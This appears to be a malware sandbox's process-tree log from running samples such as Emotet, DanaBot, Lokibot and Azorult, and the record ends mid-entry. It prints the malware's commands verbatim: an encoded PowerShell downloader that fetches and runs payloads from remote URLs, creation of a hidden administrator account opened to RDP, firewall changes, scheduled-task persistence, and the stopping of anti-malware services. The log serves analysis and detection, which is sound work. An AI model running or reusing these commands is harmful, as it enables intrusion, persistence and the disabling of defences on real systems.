    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.2.1003570629\1298952905" -childID 1 -isForBrowser -prefsHandle 2036 -prefMapHandle 2032 -prefsLen 20927 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {718d9ac3-5a0c-413c-97cc-77a637ce5c25} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 2052 18c5d458 tab
    3⤵
    PID:320
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.3.1815173673\957814589" -childID 2 -isForBrowser -prefsHandle 2500 -prefMapHandle 2496 -prefsLen 26177 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b53854f6-e097-4a02-a185-4f638530a395} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 2480 2272b558 tab
    3⤵
    PID:2628
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.4.712711852\874212818" -childID 3 -isForBrowser -prefsHandle 2816 -prefMapHandle 2812 -prefsLen 26177 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a13f25e-6389-40c6-aee7-66887655f9a3} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 2828 e69c58 tab
    3⤵
    PID:1772
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.5.874422068\1977291276" -childID 4 -isForBrowser -prefsHandle 3900 -prefMapHandle 3896 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {559e2737-2f67-48b5-9887-be18573d5383} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 3912 214af358 tab
    3⤵
    PID:2644
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.6.428349177\1178375862" -childID 5 -isForBrowser -prefsHandle 4012 -prefMapHandle 4016 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be71aa25-f29f-4b0b-a06d-665553cb1044} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 4000 214af658 tab
    3⤵
    PID:3076
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.7.55249492\772001583" -childID 6 -isForBrowser -prefsHandle 4192 -prefMapHandle 4196 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1acc91a3-b8ef-4d22-984d-9688e6ad75cc} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 4180 214b0558 tab
    3⤵
    PID:3088
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.8.56200010\1509481568" -childID 7 -isForBrowser -prefsHandle 4476 -prefMapHandle 4532 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b7c0367-41e0-4b9d-938f-c5159e662f2b} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 4540 2b3d8a58 tab
    3⤵
    PID:3132
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.9.52904004\1274209672" -childID 8 -isForBrowser -prefsHandle 4000 -prefMapHandle 1792 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cef47e54-d976-47a2-a002-bed2a0042785} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 3164 2acbbb58 tab
    3⤵
    PID:3588
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.10.1775282275\1737080239" -childID 9 -isForBrowser -prefsHandle 8912 -prefMapHandle 8832 -prefsLen 26571 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3b352ed-acb5-4d7b-9dc1-0f19659a2154} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 8844 2b285958 tab
    3⤵
    PID:2944
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.11.1318579840\1803305014" -childID 10 -isForBrowser -prefsHandle 4556 -prefMapHandle 4520 -prefsLen 26571 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {06022f77-37bd-49f8-b1f9-4c74e59fd532} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 4604 1c0f1958 tab
    3⤵
    PID:2196
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.12.1549232916\1898665609" -childID 11 -isForBrowser -prefsHandle 8872 -prefMapHandle 8864 -prefsLen 26571 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3cd1af9-6070-4cba-937b-2b0db5278aad} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 4668 1c0f2b58 tab
    3⤵
    PID:3956
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.13.1836869301\524704539" -childID 12 -isForBrowser -prefsHandle 2500 -prefMapHandle 4552 -prefsLen 26836 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5107844-fdd9-4f46-9299-ba03e3b69727} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 2644 2de6f258 tab
    3⤵
    PID:3816
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.14.1758865639\1442486786" -childID 13 -isForBrowser -prefsHandle 8676 -prefMapHandle 8672 -prefsLen 26836 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d1f51b6-46fb-48cb-91a8-37b2ed5dc4d0} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 4860 2daa3358 tab
    3⤵
    PID:3808

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x520
1⤵
PID:2968

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Botnets\FritzFrog\0ab8836efcaa62c7daac314e0b7ab1679319b2901578fd9e95ec3476b4c1a732
1⤵
PID:2348

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
1⤵
PID:2568
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer
  2⤵
  - Process spawned unexpected child process
  PID:108

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\[email protected]"
1⤵
PID:3776
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:4204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
PID:4604

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
1⤵
PID:4696
- C:\Windows\SysWOW64\regsvr32.exe
  C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\Desktop\THE-MA~1\BANKIN~1\DanaBot.dll f1 C:\Users\Admin\Desktop\THE-MA~1\BANKIN~1\DanaBot.exe@4696
  2⤵
  PID:4756
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\Desktop\THE-MA~1\BANKIN~1\DanaBot.dll,f0
    3⤵
    PID:4812

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Banking-Malware\Dridex\DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601
1⤵
PID:4936

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Browser Hijackers\BabylonToolbar.txt
1⤵
PID:5020

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\ZippedFiles.a.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\ZippedFiles.a.exe"
1⤵
PID:1080

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Yarner.a.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Yarner.a.exe"
1⤵
PID:4532

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
PID:4544

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\San.html
1⤵
PID:4860
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4860 CREDAT:275457 /prefetch:2
  2⤵
  PID:2124

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Xanax.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Xanax.exe"
1⤵
PID:4748
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 112
  2⤵
  - Program crash
  PID:1904

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Winevar.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Winevar.exe"
1⤵
PID:4820
- C:\Windows\SysWOW64\WIN280A.pif
  "C:\Windows\system32\WIN280A.pif" ~~259663882
  2⤵
  PID:3044

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4640
- C:\Windows\caZaXCMtLUbqFGntBDgljfQhuTRLJdtODbKdFbcUnzZVGTtJMslKLzXhTSgtTqMVCskBpGVYsAUIrKphYRkWNKk.exe
  "C:\Windows\caZaXCMtLUbqFGntBDgljfQhuTRLJdtODbKdFbcUnzZVGTtJMslKLzXhTSgtTqMVCskBpGVYsAUIrKphYRkWNKk.exe"
  2⤵
  PID:2016
- C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Stealer\Lokibot.exe
  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
  2⤵
  PID:3808
- - C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Stealer\Lokibot.exe
    "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 680
    3⤵
    - Program crash
    PID:1672
- C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Stealer\Azorult.exe
  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Stealer\Azorult.exe"
  2⤵
  PID:2212
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    PID:1588
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      PID:876
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:3784
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        Runs .reg file with regedit
        
        PID:3240
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        Runs .reg file with regedit
        
        PID:3264
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:3376
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        
        PID:3412
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        
        PID:3356
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        
        PID:3548
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:1488
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:3572
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        
        PID:156
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:596
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:1760
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      PID:4320
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\Programdata\Install\del.bat
        5⤵
        
        PID:4876
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:2940
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    PID:3612
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      PID:4728
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        
        PID:4976
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        
        PID:1588
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\rdp\pause.bat" "
        7⤵
        
        PID:4628
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:4896
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:2492
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:3108
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:3656
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        
        PID:4000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:1600
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:4564
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:3596
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:4292
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:896
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:1036
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:2312
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:1952
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:3216
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:4836
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:3432
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        
        PID:5056
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        10⤵
        
        PID:4780
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:3452
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        10⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        11⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1272
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1728
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2592
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:4016
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        
        PID:3252
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:3420
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9B1.tmp\9B2.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:3772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3724
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        
        PID:572
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Creates scheduled task(s)
        
        PID:796
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:1208
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\programdata\microsoft\temp\H.bat
        5⤵
        
        PID:3368
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        
        PID:2404
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:3444
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:4380
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:4508
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:2184
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:4252
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    PID:4800
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      PID:184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:3052
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    PID:3664
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    PID:2020
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:1936
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:4016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    PID:2260
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
